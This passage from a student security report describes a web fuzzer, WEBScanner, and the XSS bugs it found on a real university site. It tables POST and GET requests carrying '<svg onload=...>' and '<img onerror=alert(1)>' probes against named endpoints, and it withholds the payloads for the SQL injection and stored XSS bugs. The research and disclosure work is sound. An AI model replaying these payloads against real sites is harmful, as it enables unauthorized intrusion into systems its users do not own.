| 34 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '\<svg onload=teste0509851test>', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} |
| 35 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '\<svg onload=teste0509851test>', 'F_sys_location_t': '', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} |
| 36 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '\<svg onload=teste0509851test>', 'F_supervisor_id': '', 'F_USER': 'e0509851', 'submit': 'Continue'} |
| 37 | 'https://mysoc.nus.edu.sg/app/eform/forms/form2.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_extension_f': 'Y', 'F_hardware_type_t_others': '', 'F_os_type_t_others': '', 'F_num_appn': '1', 'F_host_nm[]': '', 'F_ethernet_addr_t[]': '', 'F_cpu_asset_n[]': '', 'F_monitor_asset_n[]': '', 'F_category_t_others': '', 'F_lab_nm': '', 'F_sys_location_t': '', 'F_supervisor_id': '\<svg onload=teste0509851test>', 'F_USER': 'e0509851', 'submit': 'Continue'} |
| 38 | 'https://mysoc.nus.edu.sg/app/eform/forms/form1.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': '', 'F_qty': '\<svg onload=teste0509851test>', 'F_extension_f': 'Y', 'F_account_nm': ''} |
| 39 | 'https://mysoc.nus.edu.sg/app/eform/forms/form1.php' | 1 | {'F_action': 'check', 'F_applicant_type': 'student', 'F_type': '', 'F_USER': '', 'F_qty': '', 'F_extension_f': 'Y', 'F_account_nm': '\<svg onload=teste0509851test\>'} |
The 39 bugs above were found automatically. With manual effort, we found two more bugs in the **mysoc** website:
No. 40 is a SQL injection bug.
No. 41 is a stored XSS bug.
As these two bugs could cause a lot of trouble if misused, we do not disclose their payloads in this report.
No. 42 is a reflected XSS bug.
| INDEX | URL | GET(0)<br/>POST(1) | PAYLOAD |
| ----- | ---------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------- | ---------- |
| 40 | https://mysoc.nus.edu.sg/app/eform/forms/form6.php | 0 | undisclosed |
| 41 | https://mysoc.nus.edu.sg/~calendar/start/PRIVATE/cal.cgi | 1 | undisclosed |
| 42 | https://mysoc.nus.edu.sg/~calendar/getBooking.cgi | 0 | room=\<img src=x onerror=alert(1)\> |
## Related Work and Existing Tools
Fuzz testing was developed at the University of Wisconsin-Madison in 1989 by Professor Barton Miller and his students. Their (continued) work can be found on [their website](http://www.cs.wisc.edu/~bart/fuzz/); it is mainly oriented towards command-line and UI fuzzing, and shows that modern operating systems are vulnerable to even simple fuzzing^1^.
### Commercial Fuzzing Products
#### Acunetix
Acunetix is a web vulnerability solution for securing websites, web applications, and APIs^5^. It can run penetration tests under user control and assess the overall security level of a website. Our project is a basic open-source version of Acunetix without its performance analysis and template-engine bug-notification functions.
#### Burp Suite
Burp Suite covers over 100 generic vulnerabilities and has leading performance against OWASP vulnerabilities. As a mature product, it offers a user-friendly GUI, provides different editions for various user groups (Enterprise, Professional and Community), and is actively updated to keep up with the latest vulnerabilities and new complications^6^.
### Open-source Fuzzing Frameworks
#### BFuzz
BFuzz is an input-based fuzzing tool that opens a new browser instance and passes multiple generated test cases to it, trying to crash the opened browser tab^3^. It is designed to find potential DoS vulnerabilities. While XSS and SQL injection may also cause DoS, the main threat they bring is data breaches.
#### Boofuzz
Boofuzz is a fork of and the successor to the venerable Sulley fuzzing framework^2^. It is aimed at testing servers at the transport layer. In general, it sends various fuzzing inputs, including malicious shellcode, oversized strings (to overflow the target's buffers) and other fuzzing data. Its target differs from ours.
#### XSStrike
XSStrike is an advanced tool suite specialized for Cross Site Scripting detection. It integrates payload generator, crawler and fuzzing engine functions. Unlike most tools in this area, XSStrike does not simply inject a random payload and then check whether it works. Instead, it analyzes the response through multiple parsers, and then generates payloads that are guaranteed to work by context analysis integrated with a fuzzing engine. It will also scan for DOM-based XSS vulnerabilities^4^.
## Summary and Future Work
Compared to those commercial products, our WEBScanner is more lightweight, probably faster, and suitable for preliminary screening to find obvious bugs. However, with smaller input dictionaries, no mutation-based generator, and coverage of only a few common vulnerabilities and primitive exploitation techniques, WEBScanner is much less capable against a wider range of attacks and against attacks with more complex or creative mechanisms.
Another key point of this project is to find as many requests as possible. At this stage, we only use forms and sub-URLs to discover new requests. However, there are other ways in which new requests are formed, for example through JavaScript:
```html
<a href="javascript: some code">
```
We therefore only cover a subset of all requests. That is the root cause of needing manual effort to find the three extra bugs.
## Finding
In addition, when we exported the WEBScanner report with Typora, we found a bug in Typora on Windows. When the statement {'appn_id': '\<svg onload=alert(1)\>'} is written directly into the file, exporting triggers an alert and the statement is lost in the PDF. As Typora is built on web technologies, this might be an XSS vulnerability.
## References
[1] https://owasp.org/www-community/Fuzzing
[2] https://github.com/jtpereyda/boofuzz
[3] https://github.com/RootUp/BFuzz
[4] https://github.com/s0md3v/XSStrike
[5] https://www.acunetix.com/product/standard/
[6] https://portswigger.net/burp